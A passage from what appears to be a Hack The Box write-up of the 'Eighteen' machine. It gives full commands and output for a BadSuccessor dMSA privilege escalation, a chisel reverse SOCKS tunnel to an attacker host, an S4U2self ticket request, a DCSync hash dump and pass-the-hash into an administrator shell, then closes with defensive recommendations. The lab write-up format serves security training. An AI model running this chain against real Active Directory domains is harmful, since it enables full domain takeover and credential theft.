The group IT (of which adam.scott is a member) holds CreateChild permissions on the Staff Organizational Unit (OU). This allows the creation of machine and service objects.
The main Invoke-BadSuccessor execution command was run:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
*Evil-WinRM* PS C:\Temp> Invoke-BadSuccessor
[+] Created computer 'Pwn' in 'OU=Staff,DC=eighteen,DC=htb'.
[+] Machine Account's sAMAccountName : Pwn$
[+] Machine Account's SID : S-1-5-21-1152179935-589108180-1989892463-12601
[+] Created delegated service account 'attacker_dMSA' in 'OU=Staff,DC=eighteen,DC=htb'.
[+] Service Account's sAMAccountName : attacker_dMSA$
[+] Service Account's SID : S-1-5-21-1152179935-589108180-1989892463-12602
[+] Allowed to retrieve password : Pwn$
[+] Added ACE on 'CN=attacker_dMSA,OU=Staff,DC=eighteen,DC=htb' for 'adam.scott' (S-1-5-21-1152179935-589108180-1982463-1609) with rights 'All' (Allow, ThisObjectOnly).
[+] Granted 'GenericAll' on 'attacker_dMSA$' to 'adam.scott'.
[+] Configured delegated MSA state for 'attacker_dMSA$' with predecessor:
CN=Administrator,CN=Users,DC=eighteen,DC=htb
[+] Next steps (Rubeus):
Rubeus.exe hash /password:'Password123!' /user:Pwn$ /domain:eighteen.htb
Rubeus.exe asktgt /user:Pwn$ /aes256:<AES256KEY> /domain:eighteen.htb
Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/eighteen.htb /dmsa /opsec /ptt /nowrap /outfile:tit.kirbi /ticket:<BASE64TGT>
[+] Alternative (Impacket):
getST.py 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'
The script successfully completed the following actions:
- Created computer account
Pwn$with passwordPassword123!. - Created a delegated Managed Service Account (dMSA)
attacker_dMSA$. - Granted
adam.scottfull control permissions over the dMSA. - Linked the predecessor parameter of
attacker_dMSA$to the Domain Administrator account (CN=Administrator,CN=Users,DC=eighteen,DC=htb).
Bypassing Firewall with SOCKS5 Proxy
Since port 88 (Kerberos KDC) is blocked from external access, a reverse SOCKS5 tunnel was set up using chisel.
On the attacker host, the server listener was started:
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ chisel server --port 6666 --reverse
2025/11/22 12:50:11 server: Reverse tunnelling enabled
2025/11/22 12:50:11 server: Fingerprint Wjresv0ZX2APVl0gkAjGhThCz6S7rIaUwfWfISAgE1s=
2025/11/22 12:50:11 server: Listening on http://0.0.0.0:6666
2025/11/22 12:58:43 server: session#1: Client version (1.11.3) differs from server version (1.13-0kali1)
2025/11/22 12:58:43 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
On the target shell, the client connector was launched:
1
2
3
4
5
*Evil-WinRM* PS C:\Temp> ./chisel.exe client 10.10.14.204:6666 R:1080:socks
chisel.exe : 2025/11/22 11:58:42 client: Connecting to ws://10.10.14.204:6666
+ CategoryInfo : NotSpecified: (2025/11/22 11:5....10.14.204:6666:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2025/11/22 11:58:44 client: Connected (Latency 315.5866ms)
Requesting Kerberos Service Ticket
Using the Pwn$ computer account credentials, an S4U2self request was sent through the proxy tunnel to request a service ticket impersonating attacker_dMSA$.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(venv)─(kali㉿kali)-[~/HTB/Eighteen]
└─$ proxychains python3 getST.py 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... EIGHTEEN.HTB:88 ... OK
[*] Impersonating attacker_dMSA$
[*] Requesting S4U2self
[proxychains] Strict chain ... 127.0.0.1:1080 ... eighteen.htb:88 ... OK
[*] Current keys:
[*] EncryptionTypes.aes256_cts_hmac_sha1_96:0eb4880e2e45a8d9a8182761a4ca0f1229aa56cf03f2fa5c64f7327a187db257
[*] EncryptionTypes.rc4_hmac:b239f8ef77412c2dd9550c7069004699
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:0b133be956bfaddf9cea56701affddec
[*] Saving ticket in attacker_dMSA$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
┌──(venv)─(kali㉿kali)-[~/HTB/Eighteen]
└─$ export KRB5CCNAME=./attacker_dMSA\$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
The exported tickets allowed administrative access due to the successor configuration mapping.
Performing DCSync Attack & Password Extraction
The administrative ticket was used with secretsdump to perform a DCSync attack, extracting the Administrator’s NT hash from the domain controller database.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(venv)─(kali㉿kali)-[~/HTB/Eighteen]
└─$ proxychains -q impacket-secretsdump -k -no-pass dc01.eighteen.htb -just-dc-user Administrator -dc-ip $IP
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
[*] Next keys grabbed
Administrator:0x14:977d41fb9cb35c5a28280a6458db3348ed1a14d09248918d182a9d3866809d7b
Administrator:0x13:5ebe190ad8b5efaaae5928226046dfc0
Administrator:aes256-cts-hmac-sha1-96:1acd569d364cbf11302bfe05a42c4fa5a7794bab212d0cda92afb586193eaeb2
Administrator:aes128-cts-hmac-sha1-96:7b6b4158f2b9356c021c2b35d000d55f
Administrator:0x17:0b133be956bfaddf9cea56701affddec
[*] Cleaning up...
The recovered administrator NT hash is 0b133be956bfaddf9cea56701affddec.
Domain Takeover
A WinRM administrative shell was established using the Administrator’s hash via Pass-the-Hash:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿kali)-[~/HTB/Eighteen]
└─$ evil-winrm -i eighteen.htb -u Administrator -H 0b133be956bfaddf9cea56701affddec
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/22/2025 11:40 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
************0f5edcdc7b683e0921b67e
The system was fully compromised and root credentials were captured.
Mitigations & Security Recommendations
To secure the eighteen.htb domain against these attack pathways, the following defensive configurations are recommended:
- Active Directory Patch Management (Mitigate BadSuccessor):
- Immediately apply Microsoft’s security updates containing hotfixes for CVE-2025-53779 on all domain controllers.
- Windows Server 2025 systems must be patched to correct the propagation rules of DMSA computer objects during rotation.
- DACL Hardening on Organizational Units:
- Audit the permission structure of all Organizational Units (specifically the
StaffOU). - Revoke wildcard write privileges or
CreateChildrights from non-administrative groups (such as theITgroup) on OUs containing critical machine, user, or service accounts.
- Audit the permission structure of all Organizational Units (specifically the
- Secure SQL Database Access Control:
- Disable or restrict
IMPERSONATEpermissions within MSSQL. The ability for standard database users to impersonate higher-privileged configurations (appdev) should be restricted to the database administrator context. - Configure strong firewall rules to prevent outgoing SMB (port 445) connections from the database host to external networks. This prevents the exploitation of
xp_dirtreeto hijack NTLM hashes.
- Disable or restrict
- Credential Hygiene Policies:
- Enforce password complexity policies and run periodic credential sprays on internal accounts to identify password reuse.
- Implement Multi-Factor Authentication (MFA) for administrative remote protocols such as WinRM, PowerShell Remoting, and RDP.







